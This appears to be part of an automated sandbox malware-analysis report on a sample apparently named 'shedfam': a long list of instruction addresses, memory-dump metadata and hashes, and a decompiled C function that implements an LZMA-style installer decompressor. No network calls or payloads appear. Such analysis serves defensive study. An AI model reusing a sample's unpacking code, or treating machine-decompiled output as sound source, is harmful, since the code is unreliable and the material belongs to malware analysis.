                                                                  0x0040670b
                                                                  0x00000000
                                                                  0x004066f6
                                                                  0x004066f6
                                                                  0x00406731
                                                                  0x00406734
                                                                  0x00406737
                                                                  0x0040673a
                                                                  0x0040673a
                                                                  0x0040673d
                                                                  0x00406744
                                                                  0x00406749
                                                                  0x0040662a
                                                                  0x0040662d
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x004069a2
                                                                  0x004069a2
                                                                  0x004069a2
                                                                  0x004069a8
                                                                  0x004069ae
                                                                  0x004069b4
                                                                  0x004069ce
                                                                  0x004069d1
                                                                  0x004069d7
                                                                  0x004069e2
                                                                  0x004069e4
                                                                  0x004069b6
                                                                  0x004069b6
                                                                  0x004069c5
                                                                  0x004069c9
                                                                  0x004069c9
                                                                  0x004069ee
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004069f0
                                                                  0x004069f4
                                                                  0x00406ba3
                                                                  0x00406bb9
                                                                  0x00406bc1
                                                                  0x00406bc8
                                                                  0x00406bca
                                                                  0x00406bd1
                                                                  0x00406bd5
                                                                  0x00406bd5
                                                                  0x00406a00
                                                                  0x00406a07
                                                                  0x00406a0f
                                                                  0x00406a12
                                                                  0x00406a15
                                                                  0x00406a15
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061b7
                                                                  0x004061c0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00000000
                                                                  0x004061d1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061da
                                                                  0x004061dd
                                                                  0x004061e0
                                                                  0x004061e4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061ea
                                                                  0x004061ed
                                                                  0x004061ef
                                                                  0x004061f0
                                                                  0x004061f3
                                                                  0x004061f5
                                                                  0x004061f6
                                                                  0x004061f8
                                                                  0x004061fb
                                                                  0x00406200
                                                                  0x00406205
                                                                  0x0040620e
                                                                  0x00406221
                                                                  0x00406224
                                                                  0x00406230
                                                                  0x00406258
                                                                  0x0040625a
                                                                  0x00406268
                                                                  0x00406268
                                                                  0x0040626c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x0040625c
                                                                  0x0040625f
                                                                  0x00406260
                                                                  0x00406260
                                                                  0x00000000
                                                                  0x0040625c
                                                                  0x00406236
                                                                  0x0040623b
                                                                  0x0040623b
                                                                  0x00406244
                                                                  0x0040624c
                                                                  0x0040624f
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406255
                                                                  0x00000000
                                                                  0x00406272
                                                                  0x00406272
                                                                  0x00406276
                                                                  0x00406b22
                                                                  0x00000000
                                                                  0x00406b22
                                                                  0x0040627f
                                                                  0x0040628f
                                                                  0x00406292
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406295
                                                                  0x00406298
                                                                  0x0040629c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040629e
                                                                  0x004062a4
                                                                  0x004062ce
                                                                  0x004062d4
                                                                  0x004062db
                                                                  0x00000000
                                                                  0x004062db
                                                                  0x004062aa
                                                                  0x004062ad
                                                                  0x004062b2
                                                                  0x004062b2
                                                                  0x004062bd
                                                                  0x004062c5
                                                                  0x004062c8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040630d
                                                                  0x00406313
                                                                  0x00406316
                                                                  0x00406323
                                                                  0x0040632b
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004062e2
                                                                  0x004062e2
                                                                  0x004062e6
                                                                  0x00406b31
                                                                  0x00000000
                                                                  0x00406b31
                                                                  0x004062f2
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x004062fd
                                                                  0x00406300
                                                                  0x00406303
                                                                  0x00406306
                                                                  0x0040630b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004069a2
                                                                  0x004069a2
                                                                  0x004069a8
                                                                  0x004069ae
                                                                  0x004069b4
                                                                  0x004069ce
                                                                  0x004069d1
                                                                  0x004069d7
                                                                  0x004069e2
                                                                  0x004069e4
                                                                  0x004069b6
                                                                  0x004069b6
                                                                  0x004069c5
                                                                  0x004069c9
                                                                  0x004069c9
                                                                  0x004069ee
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406333
                                                                  0x00406335
                                                                  0x00406338
                                                                  0x004063a9
                                                                  0x004063ac
                                                                  0x004063af
                                                                  0x004063b6
                                                                  0x004063c0
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040633a
                                                                  0x0040633e
                                                                  0x00406341
                                                                  0x00406343
                                                                  0x00406346
                                                                  0x00406349
                                                                  0x0040634b
                                                                  0x0040634e
                                                                  0x00406350
                                                                  0x00406355
                                                                  0x00406358
                                                                  0x0040635b
                                                                  0x0040635f
                                                                  0x00406366
                                                                  0x00406369
                                                                  0x00406370
                                                                  0x00406374
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x0040637c
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x00406376
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x0040636b
                                                                  0x00406380
                                                                  0x00406383
                                                                  0x004063a1
                                                                  0x004063a3
                                                                  0x00000000
                                                                  0x00406385
                                                                  0x00406385
                                                                  0x00406388
                                                                  0x0040638b
                                                                  0x0040638e
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406390
                                                                  0x00406393
                                                                  0x00406396
                                                                  0x00406398
                                                                  0x00406399
                                                                  0x0040639c
                                                                  0x00000000
                                                                  0x0040639c
                                                                  0x00000000
                                                                  0x004065d2
                                                                  0x004065d6
                                                                  0x004065f4
                                                                  0x004065f7
                                                                  0x004065fe
                                                                  0x00406601
                                                                  0x00406604
                                                                  0x00406607
                                                                  0x0040660a
                                                                  0x0040660d
                                                                  0x0040660f
                                                                  0x00406616
                                                                  0x00406617
                                                                  0x00406619
                                                                  0x0040661c
                                                                  0x0040661f
                                                                  0x00406622
                                                                  0x00406622
                                                                  0x00406627
                                                                  0x00000000
                                                                  0x00406627
                                                                  0x004065d8
                                                                  0x004065db
                                                                  0x004065de
                                                                  0x004065e8
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040663c
                                                                  0x00406640
                                                                  0x00406663
                                                                  0x00406666
                                                                  0x00406669
                                                                  0x00406673
                                                                  0x00406642
                                                                  0x00406642
                                                                  0x00406645
                                                                  0x00406648
                                                                  0x0040664b
                                                                  0x00406658
                                                                  0x0040665b
                                                                  0x0040665b
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040667f
                                                                  0x00406683
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406689
                                                                  0x0040668d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406693
                                                                  0x00406695
                                                                  0x00406699
                                                                  0x00406699
                                                                  0x0040669c
                                                                  0x004066a0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406717
                                                                  0x0040671b
                                                                  0x00406722
                                                                  0x00406725
                                                                  0x00406728
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040671d
                                                                  0x0040672b
                                                                  0x0040672e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004067d7
                                                                  0x004067d7
                                                                  0x004067db
                                                                  0x00406b79
                                                                  0x00000000
                                                                  0x00406b79
                                                                  0x004067e1
                                                                  0x004067e4
                                                                  0x004067e7
                                                                  0x004067eb
                                                                  0x004067ee
                                                                  0x004067f4
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f6
                                                                  0x004067f9
                                                                  0x004067fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063cc
                                                                  0x004063cc
                                                                  0x004063d0
                                                                  0x00406b3d
                                                                  0x00000000
                                                                  0x00406b3d
                                                                  0x004063d6
                                                                  0x004063d9
                                                                  0x004063dc
                                                                  0x004063e0
                                                                  0x004063e3
                                                                  0x004063e9
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063eb
                                                                  0x004063ee
                                                                  0x004063f1
                                                                  0x004063f1
                                                                  0x004063f4
                                                                  0x004063f7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004063fd
                                                                  0x00406403
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406409
                                                                  0x00406409
                                                                  0x0040640d
                                                                  0x00406410
                                                                  0x00406413
                                                                  0x00406416
                                                                  0x00406419
                                                                  0x0040641a
                                                                  0x0040641d
                                                                  0x0040641f
                                                                  0x00406425
                                                                  0x00406428
                                                                  0x0040642b
                                                                  0x0040642e
                                                                  0x00406431
                                                                  0x00406434
                                                                  0x00406437
                                                                  0x00406453
                                                                  0x00406456
                                                                  0x00406459
                                                                  0x0040645c
                                                                  0x00406463
                                                                  0x00406467
                                                                  0x00406469
                                                                  0x0040646d
                                                                  0x00406439
                                                                  0x00406439
                                                                  0x0040643d
                                                                  0x00406445
                                                                  0x0040644a
                                                                  0x0040644c
                                                                  0x0040644e
                                                                  0x0040644e
                                                                  0x00406470
                                                                  0x00406477
                                                                  0x0040647a
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406480
                                                                  0x00000000
                                                                  0x00406485
                                                                  0x00406485
                                                                  0x00406489
                                                                  0x00406b49
                                                                  0x00000000
                                                                  0x00406b49
                                                                  0x0040648f
                                                                  0x00406492
                                                                  0x00406495
                                                                  0x00406499
                                                                  0x0040649c
                                                                  0x004064a2
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a4
                                                                  0x004064a7
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064aa
                                                                  0x004064b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004064b2
                                                                  0x004064b5
                                                                  0x004064b8
                                                                  0x004064bb
                                                                  0x004064be
                                                                  0x004064c1
                                                                  0x004064c4
                                                                  0x004064c7
                                                                  0x004064ca
                                                                  0x004064cd
                                                                  0x004064d0
                                                                  0x004064e8
                                                                  0x004064eb
                                                                  0x004064ee
                                                                  0x004064f1
                                                                  0x004064f1
                                                                  0x004064f4
                                                                  0x004064f8
                                                                  0x004064fa
                                                                  0x004064d2
                                                                  0x004064d2
                                                                  0x004064da
                                                                  0x004064df
                                                                  0x004064e1
                                                                  0x004064e3
                                                                  0x004064e3
                                                                  0x004064fd
                                                                  0x00406504
                                                                  0x00406507
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00000000
                                                                  0x00406509
                                                                  0x00406507
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x0040650e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406549
                                                                  0x00406549
                                                                  0x0040654d
                                                                  0x00406b55
                                                                  0x00000000
                                                                  0x00406b55
                                                                  0x00406553
                                                                  0x00406556
                                                                  0x00406559
                                                                  0x0040655d
                                                                  0x00406560
                                                                  0x00406566
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x00406568
                                                                  0x0040656b
                                                                  0x0040656e
                                                                  0x0040656e
                                                                  0x00406574
                                                                  0x00406512
                                                                  0x00406512
                                                                  0x00406515
                                                                  0x00000000
                                                                  0x00406515
                                                                  0x00406576
                                                                  0x00406576
                                                                  0x00406579
                                                                  0x0040657c
                                                                  0x0040657f
                                                                  0x00406582
                                                                  0x00406585
                                                                  0x00406588
                                                                  0x0040658b
                                                                  0x0040658e
                                                                  0x00406591
                                                                  0x00406594
                                                                  0x004065ac
                                                                  0x004065af
                                                                  0x004065b2
                                                                  0x004065b5
                                                                  0x004065b5
                                                                  0x004065b8
                                                                  0x004065bc
                                                                  0x004065be
                                                                  0x00406596
                                                                  0x00406596
                                                                  0x0040659e
                                                                  0x004065a3
                                                                  0x004065a5
                                                                  0x004065a7
                                                                  0x004065a7
                                                                  0x004065c1
                                                                  0x004065c8
                                                                  0x004065cb
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x004065cd
                                                                  0x00000000
                                                                  0x0040685a
                                                                  0x0040685a
                                                                  0x0040685e
                                                                  0x00406b85
                                                                  0x00000000
                                                                  0x00406b85
                                                                  0x00406864
                                                                  0x00406867
                                                                  0x0040686a
                                                                  0x0040686e
                                                                  0x00406871
                                                                  0x00406877
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x00406879
                                                                  0x0040687c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406969
                                                                  0x0040696d
                                                                  0x0040698f
                                                                  0x00406992
                                                                  0x0040699c
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x0040699f
                                                                  0x0040699f
                                                                  0x0040696f
                                                                  0x00406972
                                                                  0x00406976
                                                                  0x00406979
                                                                  0x00406979
                                                                  0x0040697c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a26
                                                                  0x00406a2a
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a48
                                                                  0x00406a4f
                                                                  0x00406a56
                                                                  0x00406a5d
                                                                  0x00406a5d
                                                                  0x00000000
                                                                  0x00406a5d
                                                                  0x00406a2c
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3c
                                                                  0x00406980
                                                                  0x00406980
                                                                  0x00406983
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406b17
                                                                  0x00406b1a
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406751
                                                                  0x00406753
                                                                  0x0040675a
                                                                  0x0040675b
                                                                  0x0040675d
                                                                  0x00406760
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406768
                                                                  0x0040676b
                                                                  0x0040676e
                                                                  0x00406770
                                                                  0x00406772
                                                                  0x00406772
                                                                  0x00406773
                                                                  0x00406776
                                                                  0x0040677d
                                                                  0x00406780
                                                                  0x0040678e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a64
                                                                  0x00406a64
                                                                  0x00406a67
                                                                  0x00406a6e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406a73
                                                                  0x00406a73
                                                                  0x00406a77
                                                                  0x00406baf
                                                                  0x00000000
                                                                  0x00406baf
                                                                  0x00406a7d
                                                                  0x00406a80
                                                                  0x00406a83
                                                                  0x00406a87
                                                                  0x00406a8a
                                                                  0x00406a90
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a92
                                                                  0x00406a95
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a98
                                                                  0x00406a9b
                                                                  0x00406a9b
                                                                  0x00406a9f
                                                                  0x00406aff
                                                                  0x00406b02
                                                                  0x00406b07
                                                                  0x00406b08
                                                                  0x00406b0a
                                                                  0x00406b0c
                                                                  0x00406b0f
                                                                  0x00406a1b
                                                                  0x00406a1b
                                                                  0x00000000
                                                                  0x00406a21
                                                                  0x00406a1b
                                                                  0x00406aa1
                                                                  0x00406aa7
                                                                  0x00406aaa
                                                                  0x00406aad
                                                                  0x00406ab0
                                                                  0x00406ab3
                                                                  0x00406ab6
                                                                  0x00406ab9
                                                                  0x00406abc
                                                                  0x00406abf
                                                                  0x00406ac2
                                                                  0x00406adb
                                                                  0x00406ade
                                                                  0x00406ae1
                                                                  0x00406ae4
                                                                  0x00406ae8
                                                                  0x00406aea
                                                                  0x00406aea
                                                                  0x00406aeb
                                                                  0x00406aee
                                                                  0x00406ac4
                                                                  0x00406ac4
                                                                  0x00406acc
                                                                  0x00406ad1
                                                                  0x00406ad3
                                                                  0x00406ad6
                                                                  0x00406ad6
                                                                  0x00406af1
                                                                  0x00406af8
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406afa
                                                                  0x00000000
                                                                  0x00406796
                                                                  0x00406799
                                                                  0x004067cf
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x00406902
                                                                  0x00406905
                                                                  0x00406907
                                                                  0x00406b91
                                                                  0x00000000
                                                                  0x00406b91
                                                                  0x0040690d
                                                                  0x00406910
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406916
                                                                  0x0040691a
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x0040691d
                                                                  0x00000000
                                                                  0x0040691d
                                                                  0x0040679b
                                                                  0x0040679d
                                                                  0x0040679f
                                                                  0x004067a1
                                                                  0x004067a4
                                                                  0x004067a5
                                                                  0x004067a7
                                                                  0x004067a9
                                                                  0x004067ac
                                                                  0x004067af
                                                                  0x004067c5
                                                                  0x004067ca
                                                                  0x00406802
                                                                  0x00406802
                                                                  0x00406806
                                                                  0x00406832
                                                                  0x00406834
                                                                  0x0040683b
                                                                  0x0040683e
                                                                  0x00406841
                                                                  0x00406841
                                                                  0x00406846
                                                                  0x00406846
                                                                  0x00406848
                                                                  0x0040684b
                                                                  0x00406852
                                                                  0x00406855
                                                                  0x00406882
                                                                  0x00406882
                                                                  0x00406885
                                                                  0x00406888
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x004068fc
                                                                  0x00000000
                                                                  0x004068fc
                                                                  0x0040688a
                                                                  0x00406890
                                                                  0x00406893
                                                                  0x00406896
                                                                  0x00406899
                                                                  0x0040689c
                                                                  0x0040689f
                                                                  0x004068a2
                                                                  0x004068a5
                                                                  0x004068a8
                                                                  0x004068ab
                                                                  0x004068c4
                                                                  0x004068c6
                                                                  0x004068c9
                                                                  0x004068ca
                                                                  0x004068cd
                                                                  0x004068cf
                                                                  0x004068d2
                                                                  0x004068d4
                                                                  0x004068d6
                                                                  0x004068d9
                                                                  0x004068db
                                                                  0x004068de
                                                                  0x004068e2
                                                                  0x004068e4
                                                                  0x004068e4
                                                                  0x004068e5
                                                                  0x004068e8
                                                                  0x004068eb
                                                                  0x004068ad
                                                                  0x004068ad
                                                                  0x004068b5
                                                                  0x004068ba
                                                                  0x004068bc
                                                                  0x004068bf
                                                                  0x004068bf
                                                                  0x004068ee
                                                                  0x004068f5
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x004068f5
                                                                  0x00406808
                                                                  0x0040680b
                                                                  0x0040680d
                                                                  0x00406810
                                                                  0x00406813
                                                                  0x00406816
                                                                  0x00406818
                                                                  0x0040681b
                                                                  0x0040681e
                                                                  0x0040681e
                                                                  0x00406821
                                                                  0x00406821
                                                                  0x00406824
                                                                  0x0040682b
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x0040682b
                                                                  0x004067b1
                                                                  0x004067b4
                                                                  0x004067b6
                                                                  0x004067b9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406518
                                                                  0x00406518
                                                                  0x0040651c
                                                                  0x00406b61
                                                                  0x00000000
                                                                  0x00406b61
                                                                  0x00406522
                                                                  0x00406525
                                                                  0x00406528
                                                                  0x0040652b
                                                                  0x0040652e
                                                                  0x00406531
                                                                  0x00406534
                                                                  0x00406536
                                                                  0x00406539
                                                                  0x0040653c
                                                                  0x0040653f
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066a3
                                                                  0x004066a3
                                                                  0x004066a7
                                                                  0x00406b6d
                                                                  0x00000000
                                                                  0x00406b6d
                                                                  0x004066ad
                                                                  0x004066b0
                                                                  0x004066b3
                                                                  0x004066b6
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066bb
                                                                  0x004066be
                                                                  0x004066c1
                                                                  0x004066c4
                                                                  0x004066c7
                                                                  0x004066ca
                                                                  0x004066cb
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066d0
                                                                  0x004066d3
                                                                  0x004066d6
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066dc
                                                                  0x004066de
                                                                  0x004066de
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406924
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040692a
                                                                  0x0040692d
                                                                  0x00406930
                                                                  0x00406933
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406938
                                                                  0x0040693b
                                                                  0x0040693e
                                                                  0x00406941
                                                                  0x00406944
                                                                  0x00406947
                                                                  0x00406948
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694d
                                                                  0x00406950
                                                                  0x00406953
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695d
                                                                  0x0040695f
                                                                  0x00406962
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x004066e1
                                                                  0x004066e1
                                                                  0x00000000
                                                                  0x004066e1
                                                                  0x00406962
                                                                  0x00406b97
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00406bce
                                                                  0x00406bce
                                                                  0x00000000
                                                                  0x00406bce
                                                                  0x00406a1b
                                                                  0x004069a2
                                                                  0x0040699f
                                                                  0x00000000
                                                                  0x004066f4

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                                                  • Instruction ID: 7be6eb69932b41c0b27de07e5fb880b338722213318b425ba270fb710fdbb197
                                                                  • Opcode Fuzzy Hash: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                                                  • Instruction Fuzzy Hash: FE714671E00228CBDF28CF98C8447ADBBB1FB44305F15816ED856BB281C778AA96DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 98%
                                                                  			E0040663C() {
                                                                  				unsigned short _t531;
                                                                  				signed int _t532;
                                                                  				void _t533;
                                                                  				signed int _t534;
                                                                  				signed int _t535;
                                                                  				signed int _t565;
                                                                  				signed int _t568;
                                                                  				signed int _t589;
                                                                  				signed int* _t606;
                                                                  				void* _t613;
                                                                  
                                                                  				L0:
                                                                  				while(1) {
                                                                  					L0:
                                                                  					if( *(_t613 - 0x40) != 0) {
                                                                  						 *(_t613 - 0x84) = 0xa;
                                                                  						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                  					} else {
                                                                  						 *(__ebp - 0x84) = 9;
                                                                  						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                  					}
                                                                  					while(1) {
                                                                  						 *(_t613 - 0x54) = _t606;
                                                                  						while(1) {
                                                                  							L133:
                                                                  							_t531 =  *_t606;
                                                                  							_t589 = _t531 & 0x0000ffff;
                                                                  							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                  							if( *(_t613 - 0xc) >= _t565) {
                                                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                  								 *(_t613 - 0x40) = 1;
                                                                  								_t532 = _t531 - (_t531 >> 5);
                                                                  								 *_t606 = _t532;
                                                                  							} else {
                                                                  								 *(_t613 - 0x10) = _t565;
                                                                  								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                  								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                  							}
                                                                  							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                  								goto L139;
                                                                  							}
                                                                  							L137:
                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                  								 *(_t613 - 0x88) = 5;
                                                                  								L170:
                                                                  								_t568 = 0x22;
                                                                  								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                  								_t535 = 0;
                                                                  								L172:
                                                                  								return _t535;
                                                                  							}
                                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                  							L139:
                                                                  							_t533 =  *(_t613 - 0x84);
                                                                  							while(1) {
                                                                  								 *(_t613 - 0x88) = _t533;
                                                                  								while(1) {
                                                                  									L1:
                                                                  									_t534 =  *(_t613 - 0x88);
                                                                  									if(_t534 > 0x1c) {
                                                                  										break;
                                                                  									}
                                                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
                                                                  										case 0:
                                                                  											if( *(_t613 - 0x6c) == 0) {
                                                                  												goto L170;
                                                                  											}
                                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                  											_t534 =  *( *(_t613 - 0x70));
                                                                  											if(_t534 > 0xe1) {
                                                                  												goto L171;
                                                                  											}
                                                                  											_t538 = _t534 & 0x000000ff;
                                                                  											_push(0x2d);
                                                                  											asm("cdq");
                                                                  											_pop(_t570);
                                                                  											_push(9);
                                                                  											_pop(_t571);
                                                                  											_t609 = _t538 / _t570;
                                                                  											_t540 = _t538 % _t570 & 0x000000ff;
                                                                  											asm("cdq");
                                                                  											_t604 = _t540 % _t571 & 0x000000ff;
                                                                  											 *(_t613 - 0x3c) = _t604;
                                                                  											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                  											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                  											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                  											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                  												L10:
                                                                  												if(_t612 == 0) {
                                                                  													L12:
                                                                  													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                  													goto L15;
                                                                  												} else {
                                                                  													goto L11;
                                                                  												}
                                                                  												do {
                                                                  													L11:
                                                                  													_t612 = _t612 - 1;
                                                                  													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                  												} while (_t612 != 0);
                                                                  												goto L12;
                                                                  											}
                                                                  											if( *(_t613 - 4) != 0) {
                                                                  												GlobalFree( *(_t613 - 4));
                                                                  											}
                                                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                  											 *(_t613 - 4) = _t534;
                                                                  											if(_t534 == 0) {
                                                                  												goto L171;
                                                                  											} else {
                                                                  												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                  												goto L10;
                                                                  											}
                                                                  										case 1:
                                                                  											L13:
                                                                  											__eflags =  *(_t613 - 0x6c);
                                                                  											if( *(_t613 - 0x6c) == 0) {
                                                                  												 *(_t613 - 0x88) = 1;
                                                                  												goto L170;
                                                                  											}
                                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                  											_t45 = _t613 - 0x48;
                                                                  											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                  											__eflags =  *_t45;
                                                                  											L15:
                                                                  											if( *(_t613 - 0x48) < 4) {
                                                                  												goto L13;
                                                                  											}
                                                                  											_t546 =  *(_t613 - 0x40);
                                                                  											if(_t546 ==  *(_t613 - 0x74)) {
                                                                  												L20:
                                                                  												 *(_t613 - 0x48) = 5;
